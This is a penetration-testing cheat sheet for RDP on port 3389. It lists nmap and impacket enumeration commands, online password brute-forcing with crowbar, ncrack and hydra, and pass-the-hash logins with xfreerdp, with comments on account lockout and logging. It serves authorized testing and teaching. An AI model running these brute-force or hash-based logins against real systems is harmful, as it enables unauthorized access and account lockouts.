
3389 - Pentesting RDP

nmap

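# Fail early with a clear message instead of handing an empty target to nmap.
: "${IP:?set IP to the target address}"

# Service fingerprinting only: rdp-enum-encryption reports the security
# layers / encryption levels the server accepts (a quick way to spot RDP
# without NLA or with legacy encryption), rdp-vuln-ms12-020 reports the
# MS12-020 patch state, and rdp-ntlm-info reads host/domain names from the
# NTLM challenge. -Pn skips host discovery, -T4 is the faster timing template.
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn "$IP"

# impacket's RDP credential check; see its --help for the
# [domain/]user[:pass]@target form when credentials are to be tested.
/opt/tools/impacket/examples/rdp_check.py "$IP"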

bruteforce - crowbar

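# Online password guessing against RDP (-b rdp). Each guess is a failed
# logon on the target (Windows Event ID 4625 on the host) and counts toward
# the account lockout threshold, so this is both noisy and lockout-prone.
# -u: single user, -C: password file, -vv: verbose.
crowbar --server "$IP" -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv

# Same, with a user list (-U); the logging/lockout footprint scales with
# users x passwords.
crowbar --server "$IP" -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv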

bruteforce - ncrack

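# ncrack against the rdp:// service. --user: single account, -P: password
# file. Every attempt is a failed logon on the target and counts toward the
# account lockout threshold; rockyou.txt is large, so expect a long,
# highly visible run.
ncrack -vv --user chris -P /usr/share/wordlists/rockyou.txt "rdp://$IP"

# User list (-U) x password file (-P); the footprint on the target scales
# with the product of both lists.
ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt "rdp://$IP"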

bruteforce - hydra

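# hydra against rdp://. -V prints each attempt, -f stops after the first
# valid pair, -l: single login, -P: password file. As with the other
# tools above, every guess is a failed logon on the target and counts
# toward the account lockout threshold.
hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst "rdp://$IP"

# Login list (-L) x password file (-P).
hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst "rdp://$IP"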

Connect with known credentials/hash

# Interactive RDP sessions with credentials already in hand.
# <...> marks a placeholder and [...] an optional part; these lines are
# notation, not runnable shell as written.
rdesktop $IP -u <username>
rdesktop -d <domain> -u <username> -p <password> <IP>
# FreeRDP: /d: domain, /u: user, /p: cleartext password, /v: target.
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
# /pth: authenticates with the NT hash instead of a password. This generally
# only succeeds where the target allows Restricted Admin mode, which is why
# that setting is a hardening and monitoring point on the server side.
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

# /cert:ignore skips TLS certificate validation, so the session has no
# protection against interception; /w and /h set the window width/height.
xfreerdp /u:admin /p:123456  /cert:ignore /v:10.11.1.7 /w:2000 /h:900